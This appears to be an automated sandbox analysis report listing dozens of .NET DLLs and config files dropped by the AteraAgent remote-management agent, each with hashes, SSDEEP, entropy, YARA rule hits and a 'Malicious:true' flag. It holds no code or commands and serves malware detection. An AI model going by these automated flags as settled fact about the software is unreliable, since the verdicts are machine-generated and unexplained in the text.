                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.655495250287939
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:3Xh+/DtYchNyby2sE9jBF6IYiYF8pA5K+oCGUHFeFl5tPOO:3Xh+tYmNyb8E9VF6IYinAM+oCaFtB
                                                                                                                                                                                                                                        MD5:B82AE638F9E4EBD4AD8A8D7CFC2E45BD
                                                                                                                                                                                                                                        SHA1:046BFCDC1A5F858D0E0BADE9E3ED8B5B8AF8A927
                                                                                                                                                                                                                                        SHA-256:58CDD913338A3C34051CC0FA7AF6572D0D9CFD0D4F9A4F734FCD6C8969F399E2
                                                                                                                                                                                                                                        SHA-512:A80FD6B69B17F9B39363DA305FBBC691FBBD953F207CB82CE07D0B3339A22D9EE7A0802AE06590116F6ACB018B22B9D59C332D6DC646920196139B95FB7D2EE5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):75312
                                                                                                                                                                                                                                        Entropy (8bit):6.240947600880177
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Uu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYH:JF+qo7mDEwj4NXLGcfgruFcg7HxRt
                                                                                                                                                                                                                                        MD5:2E85C9C702122F118D03BE28BFD91ED0
                                                                                                                                                                                                                                        SHA1:35F355E20D39BFBA905DCEB715F489C73BD9D064
                                                                                                                                                                                                                                        SHA-256:038200D9D1D35476A036821B68A19A6A14B54C6B8100411C822104AA0CD18EFC
                                                                                                                                                                                                                                        SHA-512:2EA597952C14167A8137C6FEC1B430FFD998F80554889C0A650E81ED060D9BA7DB11AF12A9B12B1906E674DD40E80951114727DAD4E6C403FEFCCF43F9E293DE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51760
                                                                                                                                                                                                                                        Entropy (8bit):6.407265385002729
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:4QMnMYnUFMSptE7C+t2RO3neZN8752vwzE8Kku6ZFMLcyMmEpYinAMxC+:49MYn1seLE8JFMLcyMH7HxV
                                                                                                                                                                                                                                        MD5:29AA74C6424D539F2811C45BF5E67832
                                                                                                                                                                                                                                        SHA1:4DE469CF2CE0684AC2B63EB496C3ECCDAE7C3195
                                                                                                                                                                                                                                        SHA-256:37042907493F5B5AF8B018B99A23237178361571C19077F08873C8549DC5FD3D
                                                                                                                                                                                                                                        SHA-512:1EC9315715BDD03D4117E535784BE142CC6BE601691F077CEC20DDD6AD024533DB2AE0AA4F33847A0BFC8586AD47CF8ACD4306995523563AB4E6828F156C8AD6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145456
                                                                                                                                                                                                                                        Entropy (8bit):6.204131127257046
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:LRdbKQx0YYK8gwbUEA5xZs0vVV2yzlhXhYThkyFqhtuElLVwkVJe5K+Q7P6IlIhX:l9XeDmzV2yzlhKLFU1lLVp1+2flYFs6
                                                                                                                                                                                                                                        MD5:4DAAB78C30A10F505C9A704751A59371
                                                                                                                                                                                                                                        SHA1:C93E916B5002140D9082CC8993F893686CAB36F9
                                                                                                                                                                                                                                        SHA-256:811282D4430253D8A119235E5135330972A619C34F5D36248384237314874F7F
                                                                                                                                                                                                                                        SHA-512:6877156072D203AD70D87EC6E782925EB52DDE66F63E814C8928EB5CA7F89BF1823B9801689FBD087E769161F6DBDDEB228ACA13DFE962380A068A24B8291838
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96304
                                                                                                                                                                                                                                        Entropy (8bit):5.633803507709086
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Z2kKfq2RQuKDMOoytxL2L4zP+YuqL2zL7SAaDx4lbOw6OhL7HxxJq:6QmyxL2L4D+YZL2X7SAaqywjhLNq
                                                                                                                                                                                                                                        MD5:7FA05737B29342299768084E0AB0A5EA
                                                                                                                                                                                                                                        SHA1:19B8F749A56930EF22F3C22350518B2468483008
                                                                                                                                                                                                                                        SHA-256:3E5D9B14E5F4EA7BDA79788E8ED905EBA862A00E28F6A3F7BD368DFCB2FD251E
                                                                                                                                                                                                                                        SHA-512:33BA94337FF042AF48AE68A5126D92DC6BBE3A52B58DBFE6DD72BC79ADD9B0761847081C1BA64874940E0285BC748109022A56034966419649846956750F1788
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):386608
                                                                                                                                                                                                                                        Entropy (8bit):6.136214574059088
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:ZsETsbZnV4Nsaw8MkaybNq0qJh1rDHq4so8maLvdGCBg/8Q/ZmvEBv:ZsbZnMfwWFKFrrWa8BvEBv
                                                                                                                                                                                                                                        MD5:2EC7029F0ADADBFC8DA4927926418690
                                                                                                                                                                                                                                        SHA1:54912DDDF7E2445C0B82FE7BD51FE2F178AB0061
                                                                                                                                                                                                                                        SHA-256:2909E9398D2E5C0876D6E2CC431B197431E200AAB0E53966816A6D08E95D95F4
                                                                                                                                                                                                                                        SHA-512:E2852923E35EAE2B9EF60342E84323DB8B36F9BDE9B889401A6DCD02AD4171DE586CE581725C2F839DE67BD2A792C62679E5D1388388098ABAF396057EA3941A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.837755756588104
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:EN9VWhX3WZNyb8E9VF6IYinAM+oCF5Wc2E:IG8EpYinAMxCUE
                                                                                                                                                                                                                                        MD5:04750BC604E20F110D843AE24E4AEF65
                                                                                                                                                                                                                                        SHA1:A051E9CCFEBDA8B5A0C226B3C7255EC185784FCD
                                                                                                                                                                                                                                        SHA-256:3AFA7E8EED6BDB1E63F8326C452F4E43A5CDA7111A4F7B7AF0B42337F424ECC0
                                                                                                                                                                                                                                        SHA-512:1F4C2F19B4377A491044ED3CDEF9B1E4654AC6693939190DB5C0CA21CAAD75946ED08037C49D8AE718B58493D54C7BAA5E5610FF99742480C196459F24CD8B4D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):331824
                                                                                                                                                                                                                                        Entropy (8bit):6.168979309305954
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:7BhhiUWKJzPZNRntAXIjxs2f5Jg53XWlvidurmdIq8KmefViYkJTVBXi3VaKtNT+:7DMUWITZznu85k8Wdn8KmCjIFi3VvBQ
                                                                                                                                                                                                                                        MD5:B5848BDD7903F822083437F0384D9EB7
                                                                                                                                                                                                                                        SHA1:86CE9BB71AF96E66524965855ADA8331B52D60A9
                                                                                                                                                                                                                                        SHA-256:7AFA594AD2F7AC9DDAF02C47BA936F7DBDA8DB1923735C92EB9E7E19609CCDB5
                                                                                                                                                                                                                                        SHA-512:421911875A3A68CCACFA95BA79C4340E37C9472708129AED34154DEE1F6F12A20C126338DF8A193BF111D87ECAC7BF84861AF9EA9A1634D72D3238AF97155011
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):883760
                                                                                                                                                                                                                                        Entropy (8bit):6.071439575841782
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:n1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQE:n1n1p9LdRN39aQZUqp
                                                                                                                                                                                                                                        MD5:6556368F22C5C2E1085095EECDF4940E
                                                                                                                                                                                                                                        SHA1:82DCC49EF9E6B03E0A4AC024A295A5A38DDB1D3B
                                                                                                                                                                                                                                        SHA-256:53DFD8F0A97BF937DD30B2D7D6164EF3A721F41E22EA1BAD22E16C1E7E3596BA
                                                                                                                                                                                                                                        SHA-512:C801C71D965452CA41064CF144F78D85EADC85DDD36272C562E3469AFBE8B2CEF6B8D01943BA0DFAB5673B8200A9AF96FA8615C9871B1AFF732ACF3B35B3FCCE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960395457422526
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:/BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU2:/BA/ZTvQD0XY0AJBSjRlXP36RMGb
                                                                                                                                                                                                                                        MD5:A7FA2706173C5415C05366DAE20C1FB1
                                                                                                                                                                                                                                        SHA1:658158F655BCB3F948D0718AA307A88F96381806
                                                                                                                                                                                                                                        SHA-256:2A13C7FDF9A663B58CE0C1ACB1B55C38855A34CAAF73BD1C731120B47A1E6034
                                                                                                                                                                                                                                        SHA-512:3D686DB8769B701B44A4DD4EC2F0F721166E58F6BD7F146AA1A99C1DDD1866348B75F504F4B207C302ACD275164ED4005F83E09E8FD3964CADA8226BE087AC70
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):285744
                                                                                                                                                                                                                                        Entropy (8bit):6.184676930404378
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:aZAWDkTmokB1QI3A5XeedC1OcQykFlE1WhOMiSdNrgClZ73HpsP+zg:aZU0BJwuOcrl1w7HX3HWZ
                                                                                                                                                                                                                                        MD5:46EF8EF7FB431420BEC02E59C413DE8C
                                                                                                                                                                                                                                        SHA1:857F649E1B68C2350DAB0050FB9A0FA10A33E04B
                                                                                                                                                                                                                                        SHA-256:CD47B89D0CBFF121B97FF209D27E9DD7A773EFF9065ADD1B03F4B37B96B5D227
                                                                                                                                                                                                                                        SHA-512:6906E7BB97BC12785391949C20E520A2650CFEE2458C0D9D68764FB218AE755EA516C45C2FB196C6AFD47CA31114AF78521D48D9B89AECC479C99F811E845BCF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25648
                                                                                                                                                                                                                                        Entropy (8bit):6.561943281594342
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:iAQk7qYbA6fXDpLk5LHAxOEaGxBtpNyb8E9VF6IYinAM+oCsUK:B1LOg3BttEpYinAMxC2
                                                                                                                                                                                                                                        MD5:89C125D5355500E47B9358CBD77941C6
                                                                                                                                                                                                                                        SHA1:5A837BD2526650EDDFBCF76C0701B2F41A49EFD3
                                                                                                                                                                                                                                        SHA-256:AA638A8CB50FD81852138073CEB8C6C9ED58187106878210443D7574DEA5AB14
                                                                                                                                                                                                                                        SHA-512:5A1D1C24BB946D6DCA339BA19D4925A431C801DCC4C90F19B50698DC0E1C1BC41CEE1233438C567B18681F5128D7A94204E520C7FD4FC7A0536575B0029FA072
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2029
                                                                                                                                                                                                                                        Entropy (8bit):4.997010915207503
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3Aruz7h+1/gF27RgdSagFsg+w3jdgDSg+CagFt:wruv4Mw9y
                                                                                                                                                                                                                                        MD5:A1DB8C019769BA7256F40E580304C782
                                                                                                                                                                                                                                        SHA1:6C0D70EE9CEBFC288A88B100F59D5554F8C42A35
                                                                                                                                                                                                                                        SHA-256:FC68DEF71CD783C53B3D106317F879E544E3443A55AF195BDD6C663F8051A96F
                                                                                                                                                                                                                                        SHA-512:795C141D06E70CD0D91ACFFE74F519EDB78382588B10927D456D20AA70D10BADCF02A626B8B666B00B21CAFCD555F03029D16EFAABCF1D762D58AA8095B6527D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependent
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):210992
                                                                                                                                                                                                                                        Entropy (8bit):5.3486126875762565
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:rsMNkrE4AOS3ncIzkq2ijc3Y28MNwH5Z5486:wMNkrE4AOqcIzQijLQ
                                                                                                                                                                                                                                        MD5:A9C325FF89F0446C015F7083D1B7ECA0
                                                                                                                                                                                                                                        SHA1:428A8F4453585CE186DEA6C2DEEAC1061E826695
                                                                                                                                                                                                                                        SHA-256:DFEBA97F1A827853A75ACB8B624B41AB8B7D58DA6C6B9FB486C22B1060B77E59
                                                                                                                                                                                                                                        SHA-512:722D0BAAEB6271B2C52033B9E9B3C1AD56F5C4C0114B20CFEBFDAD386DFBA0FB996E2C2303E4D4891818E0851496322AE4B434D65E9AB2009B508CD3904592E0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):19433
                                                                                                                                                                                                                                        Entropy (8bit):4.9963400212242055
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:hrg4CdkumUwfGReGWeGFuGgeKCUDuTeHOTu0U5e3eTOaUmS0SXStuKhubUfSJeZY:hrPOPUDCTHffIz
                                                                                                                                                                                                                                        MD5:78AE9CC6C7B11BAC2B18E82FC7623CDB
                                                                                                                                                                                                                                        SHA1:8314E6F35448B820C7C703FC3E4DE598D2A51AEC
                                                                                                                                                                                                                                        SHA-256:D3841AA3440CDA26776DDE128157294E69A70B21344D5877D640C457353C2DCB
                                                                                                                                                                                                                                        SHA-512:CE6A750E75090487C47095B80D47F5AD0C3D3DE4D6EC58A01E14CC694600FEF951AE371DD2A1B82C756ADD66825611B13240DDD3AAE6339ED85DBD3392DED7E5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="System.Numerics.Vectors" pub
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):284208
                                                                                                                                                                                                                                        Entropy (8bit):6.117028686306414
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:hZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHP:rgo0WPVTXgv
                                                                                                                                                                                                                                        MD5:9B8D2E7F233C63FF36FD710F108886F9
                                                                                                                                                                                                                                        SHA1:5F62EB11A2D2E3860B46FCA9B933ACB0BC680AF2
                                                                                                                                                                                                                                        SHA-256:39CAEFB40FA5708EFCA73B59BA0211FE7BD0CDEA99EFEA6F39A7AB439B3E9BBD
                                                                                                                                                                                                                                        SHA-512:DD14DDEDDD29752C7DC68BA4E46D91B59E0285B0B6C17AD83887F76B78F5C628E00750592D571973745098B5DC090DAD9379F65BF2238AA211C62F15D8B4FF0D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.807984998521236
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:My8+xcexWQFW5QKNyby2sE9jBF6IYiYF8pA5K+oCGUHF1/Juf6FLv:9DNxWQFWHNyb8E9VF6IYinAM+oC5+sj
                                                                                                                                                                                                                                        MD5:8D56D8AB807E2BB053C14AAAAB3F76EC
                                                                                                                                                                                                                                        SHA1:A28A69417FE703805ADA6988786662E74429590D
                                                                                                                                                                                                                                        SHA-256:E4F6CF26C0940CEB1670EA368D61147F2E8EFB28A3D0D536D6D6A3AA38EF6188
                                                                                                                                                                                                                                        SHA-512:42A39A63D8B8386612391C7D2C8321981908E444C45858AEB3E88B24F04FEBF3978A2E615BF92476561CF388EFDF64A4ED9E8FD08B15F07C372C92134EABE19F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22064
                                                                                                                                                                                                                                        Entropy (8bit):6.671215548372165
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ArMdp9yXOfPfAxR5zwWvYW8avNyb8E9VF6IYinAM+oCANLSs:ArMcXP6gEpYinAMxCW
                                                                                                                                                                                                                                        MD5:7D7BC54735AA54284BD066195E2EFEEF
                                                                                                                                                                                                                                        SHA1:7D9F694798845C6F953E0BAE47B538FDAABD7326
                                                                                                                                                                                                                                        SHA-256:CBFDFAF72E7059EA889644CA573281290386EDF7FFE8A88F2388384488BC7224
                                                                                                                                                                                                                                        SHA-512:7B00BAF2A970C1393F0178321D5C971780C0559DD74479216B384530FDFF1C595A989DD713416107A21FB0C29AC631865D9CA6F7A527C7CAF6425435C2ED87EA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.906510872301998
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.900073443661473
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.906424509107109
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.75959124456669
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.810461358672356
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.858702500937733
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16944
                                                                                                                                                                                                                                        Entropy (8bit):6.791464340264074
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.852002078673193
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:rT+6ywnVvW0LWoNyb8E9VF6IYinAM+oCcu6Pw:r99tEpYinAMxCD
                                                                                                                                                                                                                                        MD5:CDA30CFA16AECFAB920EF4F7607A703C
                                                                                                                                                                                                                                        SHA1:8AAA41044D80B577F87E83A6D80B243EAF07C1D8
                                                                                                                                                                                                                                        SHA-256:B8F7461421716C7D235BB8595C4A50B632218B54DAB78476005458B065F11B3F
                                                                                                                                                                                                                                        SHA-512:445962C0D27CE9D2F189A5EDA3A1D2106542433DC80CD1EFD9E780761AEFAFB7C9FBF5E5097AAA18C91C06BCDF9CE593C642EB949B775A69A74F4A2F09B7C3D4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
